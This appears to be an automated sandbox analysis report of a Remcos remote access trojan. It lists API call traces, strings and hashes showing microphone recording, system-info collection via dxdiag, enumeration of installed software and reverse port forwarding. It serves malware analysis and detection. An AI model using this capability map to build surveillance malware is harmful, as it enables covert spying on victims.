                                                                                                                                                                                                                                                                                                                              • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f568d79055422364b0fc155fd47d6165a7356d41c75c5dcd4a60a29222dfb7a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DEF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DFB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E06
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E11
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E1C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E27
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E32
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E3D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E48
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E56
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028359EA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028359F6
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A01
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A0C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A17
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A22
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A2D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A38
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A43
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A51
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 89216c1e2138de03ad294d13ec247ed03cbe036037954b473e9875110df904c3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6c4f5eb2dbe82c97fa2a1ac581e92599305f5c2c928d5efd8284282f51dc80f5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89216c1e2138de03ad294d13ec247ed03cbe036037954b473e9875110df904c3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611747E520148EFCB22EF58D941CDD3FA6EF08350B9545A5BA088B225DB35DB509F81
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016970
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001697C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016987
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016992
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001699D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169A8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169B3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169BE
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169C9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169D7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4486635b9f067f5c856a3a66de58a1cd354bc26f8124cf63660485fb98f8bcde
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC11447A550108FFCB01DF54C982CD93BA5EF08651F9D82A5F9498F622DA32EF909B81
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                                                                                                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
                                                                                                                                                                                                                                                                                                                              • DisplayName, xrefs: 0041B8E1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnumOpen
                                                                                                                                                                                                                                                                                                                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                              • API String ID: 1332880857-3614651759
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e61d1d7cf3832e843e90d461229c70805b874dd96863d967c161257da2d9d002
                                                                                                                                                                                                                                                                                                                              • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e61d1d7cf3832e843e90d461229c70805b874dd96863d967c161257da2d9d002
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                                                                                                              • String ID: Remcos
                                                                                                                                                                                                                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DBA
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DC6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 201697637-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
APIs
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: _free$EnvironmentVariable_wcschr
• String ID:
• API String ID: 487594629-0
• Opcode ID: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
• Instruction ID: 24f0059e533d9f3fb59acd5008695e198d0c5eb1710b72595803e493e6dfdcaf
• Opcode Fuzzy Hash: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
• Instruction Fuzzy Hash: D0616975904351ABD710DF78CC81A5EB7E4EF09760F5A426DF9419F2C1EA32E9818B90
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02831D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D8A
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 9c5884e815b8b4e486a01e2dce58e73a4a159e011904fdfaec3f45072de3766a
• Instruction ID: 1c25d828e7dc9e5a799880e6beba9fba428e5808915dd61ab7202b005f613080
• Opcode Fuzzy Hash: 9c5884e815b8b4e486a01e2dce58e73a4a159e011904fdfaec3f45072de3766a
• Instruction Fuzzy Hash: 89215EB9D8121CBFEB119BA49C8CEEB76ACEB09B44F000D65F505D2180D7709E558BB0
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• _memcmp.LIBVCRUNTIME ref: 004446B3
• _free.LIBCMT ref: 00444724
• _free.LIBCMT ref: 0044473D
• _free.LIBCMT ref: 0044476F
• _free.LIBCMT ref: 00444778
• _free.LIBCMT ref: 00444784
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
• Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
• Opcode Fuzzy Hash: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
• Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-3725065008
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
